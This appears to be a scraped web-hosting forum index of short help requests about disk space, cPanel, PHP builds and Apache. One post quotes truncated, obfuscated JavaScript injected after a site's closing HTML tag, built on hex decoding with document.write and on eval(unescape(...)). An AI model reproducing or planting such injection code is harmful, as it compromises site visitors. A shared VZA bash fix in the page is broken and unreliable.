Disk /dev/sda1 (/) 91 % - Showing Red

May 3, 2009

cpanel is showing -

Disk /dev/sda1 (/) 91 % - Showing Red

what can i do to fix it.....

OS reload will be a problem for me...

View 14 Replies


ADVERTISEMENT

Drive Warning: /sda1 (/) Is 82% Full

May 4, 2007

to delete same files can you help me how can I delete it without any problem?

Code:
df -h

Code:
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 9.7G 7.4G 1.8G 82% /
/dev/sda5 109G 36G 68G 35% /home
/dev/sda2 15G 13G 1.6G 89% /var
/dev/sdb1 135G 95G 33G 75% /backup
none 2.5G 0 2.5G 0% /dev/shm
/usr/tmpDSK 485M 52M 408M 12% /tmp
/tmp 485M 52M 408M 12% /var/tmp

View 13 Replies View Related

Use Almost Disk Space Will Harm Hard Disk

Apr 29, 2008

My server has a small SAS disk(about 73G), if I use 90% diskspace of it, is it good idea, will it harm the physical HDD?

View 6 Replies View Related

2 SATAII Disk W/RAID0 Vs One SAS Disk

Jan 8, 2009

I am looking for better disk performance. Due to the tight budget, I have to choose one of following options as my disk choice:

2 SATAII disk w/RAID0, 7200rpm, 32M cache for each disk

1 SAS disk, 15000rpm, 16M cache.

which one will be better and how better if other things(hardware & OS) are same?

View 14 Replies View Related

Disk Image To Disk Partition (Xen)

Sep 1, 2008

can a Xen disk image be converted to a diskpartition?

Someone is asking whether I can host his disk image at his current host, which he is leaving for poor I/O (wonder why that would be ). I can host a diskimage, but I don't like diskimages (slow, and 100GB isn't very 'comfortable' either). Is there any way out there to convert a disk image into a normal partition?

View 3 Replies View Related

Apache :: Use Disk To Enhance For Page Cache And Database Cache For Disk

Apr 24, 2013

I use apache with CentOS VPS hosting for my blog. I only host one blog in this VPS account. I have 1.5GB RAM and I have 7, 500 page preview per day. My page loading time is 2-3 seconds (according to the pingdom tool).

I want to know what is the best performance (faster web page loading) W3 Total cache option for VPS hosting blog. Currently I use Disk to enhance for page cache and database cache for disk.

View 2 Replies View Related

VZA Not Showing Vps's In Pim

Nov 5, 2009

If you run into the fun error of Parallels VZA not showing your vps's

might try this

Code:
#
# Compatability fix for the vza from pim to vza
# Nicholas Rose nick.rose@nobistech.net
#

#updatedb
for i in `locate /ve.conf`; do
$vehost=`cat $i | grep HOSTNAME | grep HOSTNAME | awk -F '"' '{print $2}'`
sed -i 's/VE_TYPE="regular"//g' $i
echo 'VE_TYPE="regular"' >> $i
echo 'I just fixed '`cat $i | grep HOSTNAME | grep HOSTNAME | awk -F '"' '{print $2}'`

View 0 Replies View Related

PhpMyAdmin Not Showing Up

Jul 18, 2009

I've just did the following on Ubuntu Server 9.03:

Code:

sudo apt-get install mysql-server
sudo apt-get install apache2
sudo apt-get install php5
sudo apt-get install php5-mysql
sudo apt-get install phpmyadmin

But when I say [url]-- it cannot be found..

I tried [url]as well, It cannot be found either.

View 2 Replies View Related

CentOS Showing 3.5GB Ram Instead Of 4GB

Jun 21, 2008

i recently installed CentOS 5.1 with some new hardware.

After installation when i type free in SSH the total amount of RAM shows as: 3359580

I have two brand new Corsair 2GB modules installed.

Is this normal?

View 14 Replies View Related

Bandmin Not Showing All IP's

Apr 15, 2007

How would I set up Bandmin to show the extra 5 IP's that I just added ?

It shows stats for the main shared IP, but isn't for the 5 new ones that I added via WHM.

Help plz.....

(these IP's are not assigned to any domains, as they are just used for downloads)

View 0 Replies View Related

FTP Not Showing Directories

Dec 31, 2007

Whenever i try to connect to ftp through any of my server account then its not showing any directory inside public_html but when i use cpanel file manager then its working fine i also tried to used differect ftp client program but still problem not solve will any of you help me? ftp successfully connected but not showing files and folders .

View 3 Replies View Related

Showing VPS Uptime

Oct 4, 2007

I have a VPS and am looking for a way to show existing and potential clients the uptime levels of the server. I have a basic uptime page provided by WHMCS, but I want to go a little beyond that.

If I were to choose an uptime reporting service such as siteuptime.com, hyperspin.com or site24x7.com, what would you recommend that I monitor? Obviously HTTP, FTP, POP3 and MySQL, but anything else? Do these services monitor the server load also?

Also, is it a good idea to display these stats publicly?

View 5 Replies View Related

Php -v Keep Showing 4.4.7 Even After I Recompile Apache As 5.0.4

Oct 19, 2007

php -v keep showing 4.4.7 even after i recompile apache as 5.0.4 via WHM > Apache Update. Any ideas how to fix this?

I am on the following server:

WHM 11.2.0 cPanel 11.11.0-S16999
CENTOS Enterprise 5 x86_64 - WHM X v3.1.0

./configure [@php-5.0.4]...(--enable-pic --with-libdir=lib64 --prefix=/usr --with-xml --with-mm --enable-bcmath --enable-calendar --with-curl --with-dom --with-dom-xslt --with-dom-exslt --enable-exif --with-swf=/usr/local/flash --enable-ftp --with-gd --with-jpeg-dir=/usr/local --with-png-dir=/usr --with-xpm-dir=/usr/X11R6 --with-gettext --with-imap=/usr/local/imap-2004g --enable-mbstring --enable-mbstr-enc-trans --enable-mbregex --with-mcrypt --with-mhash --enable-magic-quotes --with-mm --with-mysqli --with-mysql=/usr --with-snmp --enable-ucd-snmp-hack --with-openssl --enable-discard-path --with-pear --with-pspell --enable-safe-mode --enable-sockets --enable-track-vars --with-ttf --with-freetype-dir=/usr --enable-gd-native-ttf --enable-versioning --enable-wddx --with-xmlrpc --with-zip --with-zlib).... . . . . . . . . . . . . Done

configure: error: libXpm.(a|so) not found.

make [@php-5.0.4]...(-j 8 clean).... Done

make [@php-5.0.4]...(-j 8).... Done

make [@php-5.0.4]...(install).... Done

initfpsuexec: using apache 1.x support
PHP version file has been updated to 4.4.7
Adding cPanel default aliases ...disabled scgi-bin since suexec is installed
Done
Executing /scripts/postbuildapache (if exists)...Done
Configuring perl magic....Off
Configuring php-pear magic....Off
Configuring ruby magic....Off
Configuring php-pecl magic....Off
/etc/rc.d/init.d/httpd start: httpd started
initfpsuexec: using apache 1.x support

Attempting to restart httpd

Waiting for httpd to restart...

httpd started ok

View 2 Replies View Related

Showing Error Codes

Apr 14, 2009

I would like to be able to cause my server to show each error code from 404, to 501 etc and to run though the list and to show me what appears, is there a tool or a online tool that can do this?

View 23 Replies View Related

Index Page Not Showing

Jul 23, 2009

i have hosted my website on dadicated windows hosting with rackspace. my webiste default page was index.aspx. now i have created new home page with name the of index.html and uploaded this page to server and deleted old home page index.aspx but my new index.html page not showing when i try to open open my website www.example.com but its opening when i try with www.example.com/index.html.

View 4 Replies View Related

Apache Log Only Showing 127.0.0.1 Entries

Jan 28, 2008

Centos4/WHM/Apache 2.2.6/eaccelerator

My access_log is only showing entries like:

127.0.0.1 - - [28/Jan/2008:17:26:46 -0600] "GET / HTTP/1.0" 200 2860
127.0.0.1 - - [28/Jan/2008:17:27:30 -0600] "GET / HTTP/1.0" 200 2860
127.0.0.1 - - [28/Jan/2008:17:27:31 -0600] "GET / HTTP/1.0" 200 2860 ....

View 1 Replies View Related

File Showing Limit

Feb 27, 2008

my server runs centos with whm/cpanel,

some folder may contain over 1000s files,

and the ftp only can show 1000s files well,

where can i large the value and let it show more?

View 7 Replies View Related

Php Showing Code Not Executing

May 14, 2007

i have a vps account and am trying to setup my website i installed php 4 from a control panel where it auto installed php and there is mysql and i installed all of them but when i upload my script and go to install or go to the index of my site it shows the php code and does not execute.

my permissions are right on i also made a testphp file and used this code <?php phpinfo(); ?> and still nothing just shows the php code when you browse to the file i even went further i installed from the control panel another program called phpmyadmin and when i log in it does the same thing just shows php code so what the hell is going on you think i need to contact my host provider for this issue i sent an email out but waiting for a responce

View 7 Replies View Related

Memory_limit Value Not Showing In Phpinfo

May 21, 2007

in my php.ini I have:
memory_limit = 32M

but when I load a phpinfo() page, the setting is displayed nowhere.

Is there a reason for this ? I fear the setting is not taken in consideration by the server because of this.

View 0 Replies View Related

Apache Not Showing Full URL?

Apr 1, 2013

When I go to the [URL] ... is loads the index page just fine. When I go use the [URL] .... it still loads the index page, I don't want it to do that, I want it it to load test.php. When I click on a link (for say [URL] ....) on index.php the url stays as [URL] ....; I actually want it to show [URL] .... (while I test things at least). Is this a .htaccess issue?

View 2 Replies View Related

Changed Dns, But Still Showing Parked Page?

May 10, 2006

I changed the dns for a domain I purchased yesterday to a parking service at parked.com

Last night I changed the name servers to my hostgator ones. It worked. I was installing joomla, and publishing the site. Everything was fine when I went to bed.

So I wake up this morning.. now when I go to the site it shows the stupid parked.com parking page instead of what I was working on.

I deleted all the cache, history, temp internet files, cookies, everything.. I tried in firefox, and IE. I tried on two different computers. I can't get my site to load up.

I called hostgator and they said the site is fine and they don't see a park page. They told me just to clear my cache again.

the site is www.wiispecs.com

I would appreciate it if someone could check it out and tell me what site they see. I could use any ideas on how to fix this so I can view the page too.

I tried switching name servers to godaddy and then switching back to hostgator. I also emailed parked.com tech support.

View 9 Replies View Related

Stop My Tun Ip Address Showing In Add New CPanel

Jul 5, 2007

hi, is there any way to stop my tun adapters ip address showing in the combo box of the create new account page (the Ip Address (only for new ip-based accounts) combo box).

View 8 Replies View Related

Forum Is Showing A Blank Page

Jan 27, 2009

A few days ago i was transferred to a different server within my hosting company. All of my sites remained the same except the only forum i have (phpbb3) now displays a blank page. All the files and database are still intact and nothing has been changed. Any suggestions as to how i would fix this problem? would it be best to backup the database and reinstall a new copy of phpbb?

View 9 Replies View Related

Videos Not Showing With Mencoder & ClipShare

Jun 13, 2009

I have problem with clipshare script. when i upload videos, they are successfully uploaded into video dir and thumbnails are also generated.

But when playing them, it constantly say loading....

I checked the flvideo dir, and it converted video(flv) is not there.

I searched a little and found a small changed needs to be done in convert.php. which i did but still it does not convert.

I wanted to know

* Where can i find conversion logs or more information on what exactly is going on, to further debug the issue.

* In convert.php i have replaced -lavfopts

i_certify_that_my_video_stream_does_not_use_b_frames -vop

WITH

-ofps 12 -vf
but still not fixed. should i roll back to previous state?

From siteadmin panel

system check

Code:
FLVIDEO Directory
writable (0777) (/home/hell2006/public_html/flvideo)

VIDEO Directory
writable (0777) (/home/hell2006/public_html/video)
THUMBS Directory
writable (0777) (/home/hell2006/public_html/thumb)
CHANNEL Directory
writable (0777) (/home/hell2006/public_html/chimg)
PHOTO Directory
writable (0777) (/home/hell2006/public_html/photo)
TMP Directory
writable (0777) (/home/hell2006/public_html/tmp)

Safe Mode

Open Basedir .....

View 6 Replies View Related

Update Php And Website Showing Php Code

Apr 10, 2009

I have update php successfully 5.2.6 to 5.2.9.

-bash-3.2# php -v
PHP 5.2.9 (cli) (built: Apr 10 2009 00:53:01)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2009 Zend Technologies

i already restart the httpd but everytime I go to my website, php page is now showing my php page as php code. :/

View 9 Replies View Related

HTTP IP Showing Random Account

Oct 29, 2008

My server is centos 5 with cPanel.

When I go to [url](xx.xx.xx.xx being an IP on my server) it shows a random web hosting account that is on that IP?

How do I stop this and put one page there or the "great success, cPanel and apache are working on your server" page there?

View 11 Replies View Related

Hacker :: Pages Showing Errors

May 7, 2008

It seems like someone has hacked into my server, and all of the pages for one of my domains are showing errors.

Each page on my site is showing a PHP inclusion error, each file on my site is trying to include an unknown file /tmp/blah.php for example which doesn't exist on my site, therefore creating errors and not showing my site.

I checked my site in ftp, it isn't in the code. So it is definitely in a server file somewhere.

What could be doing this? Its for a single domain only, I've created the file it is trying to include as a temporary fix, I have checked php.ini and there seems no reference to the included file there.

View 3 Replies View Related

CentOS5: VI Not Showing Files With Color

May 2, 2007

I tried CentOS5 on my new server. Having CentOS 4 on all other server I never faced this issue. I always get server with vim -minimal installed and I install vim enhanced and common to get text color highlighting.

View 2 Replies View Related

Strange Script Showing After </html>

Nov 5, 2007

On a particular host for someone I know, they asked me what this is and I've seen it once before but no one seems to know what it is, why it shows up and how:

Code:
</body>
</html><script>function v472ef633a10d3(v472ef633a2094){ return(parseInt(v472ef633a2094,16));}function v472ef633a5018(v472ef633a5fe0){ function v472ef633a8f39 () {return 2;} var v472ef633a6faa='';for(v472ef633a7f70=0; v472ef633a7f70<v472ef633a5fe0.length; v472ef633a7f70+=v472ef633a8f39()){ v472ef633a6faa+=(String.fromCharCode(v472ef633a10d3(v472ef633a5fe0.substr(v472ef633a7f70, v472ef633a8f39()))));}return v472ef633a6faa;} document.write(v472ef633a5018('3C5343524950543E77696E6.......etc etc</script>
There's another one that starts with:

Code:
</html><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%

View 0 Replies View Related

Logwatch Showing Unmatched Entries

May 14, 2007

Posts have been disappearing the last 2 days on WHT. Let me try this again.

The server is new and do not have any websites setup yet. It's already getting these entries. Is this normal? Should we move to a different SSH port?

**Unmatched Entries**
sendto(72.64.118.118): Operation not permitted: 72 time(s)
sendto(69.182.190.97): Operation not permitted: 73 time(s)
sendto(66.93.44.19): Operation not permitted: 72 time(s)

View 6 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved